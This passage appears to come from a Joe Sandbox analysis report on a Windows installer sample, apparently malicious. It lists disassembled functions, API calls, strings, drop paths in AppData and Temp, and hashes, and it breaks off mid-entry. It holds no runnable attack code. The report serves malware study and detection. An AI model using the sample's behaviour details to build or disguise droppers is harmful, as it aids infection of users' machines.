                                                • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                • Instruction ID: 71749ee66451d02820e1787a81c679d49f65c12e6a5790e59d0bd58148e6f3af
                                                • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                • Instruction Fuzzy Hash: 64F021705001196BCF10AB64DD0DFAB3B5CA700304F10487AA546F11D1EBBDDA65CB98
                                                Function 004057B5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1016 4057b5-405800 CreateDirectoryW 1017 405802-405804 1016->1017 1018 405806-405813 GetLastError 1016->1018 1019 40582d-40582f 1017->1019 1018->1019 1020 405815-405829 SetFileSecurityW 1018->1020 1020->1017 1021 40582b GetLastError 1020->1021 1021->1019
                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                • GetLastError.KERNEL32 ref: 0040580C
                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405821
                                                • GetLastError.KERNEL32 ref: 0040582B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 3449924974-224404859
                                                • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                • Instruction ID: 81d47e77b106c5c69b6f53bab6ade4ced08fad65239eb4e1eedbceb886e7a33c
                                                • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                • Instruction Fuzzy Hash: 8C01E5B2C00619DADF009FA1D9487EFBFB8EB14354F00803AD945B6281E7789618CFA9
                                                Function 00405DA3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1022 405da3-405daf 1023 405db0-405de4 GetTickCount GetTempFileNameW 1022->1023 1024 405df3-405df5 1023->1024 1025 405de6-405de8 1023->1025 1027 405ded-405df0 1024->1027 1025->1023 1026 405dea 1025->1026 1026->1027
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00405DC1
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\3507071243740008011.exe",00403371,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF), ref: 00405DDC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-3909342656
                                                • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                • Instruction ID: 0c0ec814c80ab85915f41b1413265c2d813ce01cabb3ac5407dd3af97de42ecd
                                                • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                • Instruction Fuzzy Hash: 99F03076600304FFEB009F69DD09E9BB7A9EF95710F11803BE900E7250E6B199549B64
                                                Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1028 10001759-10001795 call 10001b18 1032 100018a6-100018a8 1028->1032 1033 1000179b-1000179f 1028->1033 1034 100017a1-100017a7 call 10002286 1033->1034 1035 100017a8-100017b5 call 100022d0 1033->1035 1034->1035 1040 100017e5-100017ec 1035->1040 1041 100017b7-100017bc 1035->1041 1042 1000180c-10001810 1040->1042 1043 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 1040->1043 1044 100017d7-100017da 1041->1044 1045 100017be-100017bf 1041->1045 1049 10001812-1000184c call 100015b4 call 100024a4 1042->1049 1050 1000184e-10001854 call 100024a4 1042->1050 1065 10001855-10001859 1043->1065 1044->1040 1051 100017dc-100017dd call 10002b57 1044->1051 1047 100017c1-100017c2 1045->1047 1048 100017c7-100017c8 call 1000289c 1045->1048 1053 100017c4-100017c5 1047->1053 1054 100017cf-100017d5 call 10002640 1047->1054 1061 100017cd 1048->1061 1049->1065 1050->1065 1064 100017e2 1051->1064 1053->1040 1053->1048 1069 100017e4 1054->1069 1061->1064 1064->1069 1070 10001896-1000189d 1065->1070 1071 1000185b-10001869 call 10002467 1065->1071 1069->1040 1070->1032 1076 1000189f-100018a0 GlobalFree 1070->1076 1078 10001881-10001888 1071->1078 1079 1000186b-1000186e 1071->1079 1076->1032 1078->1070 1081 1000188a-10001895 call 1000153d 1078->1081 1079->1078 1080 10001870-10001878 1079->1080 1080->1078 1082 1000187a-1000187b FreeLibrary 1080->1082 1081->1070 1082->1078
                                                APIs
                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                  • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                  • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                  • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2455471246.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2455454451.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.2455493031.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.2455538566.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc$Librarylstrcpy
                                                • String ID:
                                                • API String ID: 1791698881-3916222277
                                                • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761
                                                Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1085 4023de-40240f call 402c37 * 2 call 402cc7 1092 402415-40241f 1085->1092 1093 402abf-402ace 1085->1093 1095 402421-40242e call 402c37 lstrlenW 1092->1095 1096 402432-402435 1092->1096 1095->1096 1097 402437-402448 call 402c15 1096->1097 1098 402449-40244c 1096->1098 1097->1098 1102 40245d-402471 RegSetValueExW 1098->1102 1103 40244e-402458 call 4030fa 1098->1103 1107 402473 1102->1107 1108 402476-402557 RegCloseKey 1102->1108 1103->1102 1107->1108 1108->1093 1110 402885-40288c 1108->1110 1110->1093
                                                APIs
                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp,00000023,00000011,00000002), ref: 00402429
                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp,00000000,00000011,00000002), ref: 00402469
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp,00000000,00000011,00000002), ref: 00402551
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CloseValuelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp
                                                • API String ID: 2655323295-1618862768
                                                • Opcode ID: b9a55d7f8e3e2dfd25d95f10a550debddd0b738e27ba6f811f629087d2df6e98
                                                • Instruction ID: 6bb9d856f7880fc58a9027dca602f60b1bf716c37025aa19f03bdcb786be9778
                                                • Opcode Fuzzy Hash: b9a55d7f8e3e2dfd25d95f10a550debddd0b738e27ba6f811f629087d2df6e98
                                                • Instruction Fuzzy Hash: 33118171E00108AEEB10AFA5DE49EAEBAB8EB54354F11843AF504F71D1DBB84D419B58
                                                Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Close$Enum
                                                • String ID:
                                                • API String ID: 464197530-0
                                                • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                • Instruction ID: 79d7ed05643b621c8e133add132d673d265f3a1e436d48668917152172a1be90
                                                • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                • Instruction Fuzzy Hash: AD116A32540509FBDF129F90CE09BEE7B69EF58340F110036B905B50E0E7B5DE21AB68
                                                Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00405BFE: CharNextW.USER32(?,?,0042FA50,?,00405C72,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C0C
                                                  • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                  • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                  • Part of subcall function 004057B5: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular,?,00000000,000000F0), ref: 0040164D
                                                Strings
                                                • C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular, xrefs: 00401640
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID: C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular
                                                • API String ID: 1892508949-3139891972
                                                • Opcode ID: 64933fb819e76c9c5a4bf4a349c51baae94111e9253f76940e8e3ccf7a91a371
                                                • Instruction ID: f4fc84295b44ed4b17ac4e1ae603b231d2bd930c419d474b78473434f223dd35
                                                • Opcode Fuzzy Hash: 64933fb819e76c9c5a4bf4a349c51baae94111e9253f76940e8e3ccf7a91a371
                                                • Instruction Fuzzy Hash: 7711BE31504104ABCF316FA4CD01AAF36A0EF14368B28493BEA45B22F1DB3E4E519A4E
                                                Function 0040525A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00405289
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004052DA
                                                  • Part of subcall function 00404263: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404275
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                • Instruction ID: e35359e86d41fb5d6968ee62a371e6abd11f03428b82ac61abb391d392e116c6
                                                • Opcode Fuzzy Hash: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                • Instruction Fuzzy Hash: 0E017131510609ABDF209F51DD84A5B3A25EF84754F5000BBFA04751D1C77A9C929E6E
                                                Function 00406150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,0042C228,00000000,?,?,Call,?,?,004063C4,80000002), ref: 00406196
                                                • RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C228), ref: 004061A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID: Call
                                                • API String ID: 3356406503-1824292864
                                                • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                • Instruction ID: ccae29ee16f81b62eed190a0e72f85d1395cd89474178e8bc9e2f9375c5b4726
                                                • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                • Instruction Fuzzy Hash: C7017172510209EADF21CF55CD05EDF3BA8EB54360F018035FD1596191D779D968CBA4
                                                Function 00405867 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                • CloseHandle.KERNEL32(?), ref: 0040589D
                                                Strings
                                                • Error launching installer, xrefs: 0040587A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                • Instruction ID: d54ab7d3c02f92ec190dfac26e1bcd6e14271da7ed0e34d6283108f8b7c5a0e7
                                                • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                • Instruction Fuzzy Hash: D4E09AB5900209BFEB109F65DD49F7B77ACEB04744F004565BD50F2150D778D8148A78
                                                Function 0040202C Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057
                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                  • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                  • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 334405425-0
                                                • Opcode ID: 864119935e3c92a972c97e6683a8f1d17c59749ba81c3d86f0a55431c134cf0a
                                                • Instruction ID: 42f79ed1eba5b951ee52ea84f7896f3e8cd2b7b6c2435203e6ffc1da5cb37fd9
                                                • Opcode Fuzzy Hash: 864119935e3c92a972c97e6683a8f1d17c59749ba81c3d86f0a55431c134cf0a
                                                • Instruction Fuzzy Hash: EF21C271900208EACF20AFA5CE4DAAE7A70AF04358F64413BF611B51E0DBBD8941DA5E
                                                Function 00401B71 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalFree.KERNEL32(00791940), ref: 00401BE1
                                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree
                                                • String ID: Call
                                                • API String ID: 3394109436-1824292864
                                                • Opcode ID: 84467de0dce396edb77585f845136cbcf2c5fb7762c5f8c3cd98e46705f302be
                                                • Instruction ID: 92ace51ac37ea5806125e07fe733601b5cdc010b72bea360b2f02f73c4ad7c89
                                                • Opcode Fuzzy Hash: 84467de0dce396edb77585f845136cbcf2c5fb7762c5f8c3cd98e46705f302be
                                                • Instruction Fuzzy Hash: 4921C072A01100DFDB20EB94CE8495A76A9AF44318725013BF902F72D1DA78A9519B5D
                                                Function 1000289C Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000), ref: 1000295B
                                                • GetLastError.KERNEL32 ref: 10002A62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2455471246.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2455454451.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.2455493031.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.2455538566.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastPointer
                                                • String ID:
                                                • API String ID: 2976181284-0
                                                • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
